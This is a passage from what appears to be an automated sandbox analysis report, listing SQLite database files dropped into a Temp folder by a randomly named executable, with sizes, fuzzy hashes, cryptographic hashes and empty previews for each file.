                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\cx95CFRZOx

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\deDPwfECdD

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\dioFFjjX2v

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\djhBGsynIK

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\eAHTZQUzwn

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\eBYbSLOMDU

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\eIJVGaPEe7

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\eIYCEcSreB

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ebaspZsOQx

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\enMLBkY3I3

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\eoteNawfUT

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\eqDArfobvr

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\etayrgI7Om

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ewnGchKrdk

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\f42nFoC3Qq

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\f8DgBIsOrl

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\fdaLwnULSo

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\fexW3nrrsH

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\flU1xZudua

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\fpdNLjW9bb

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\fzkg2yXizP

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\g3iNYQGi3r

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\g7RzIdsUtP

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):5242880
                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
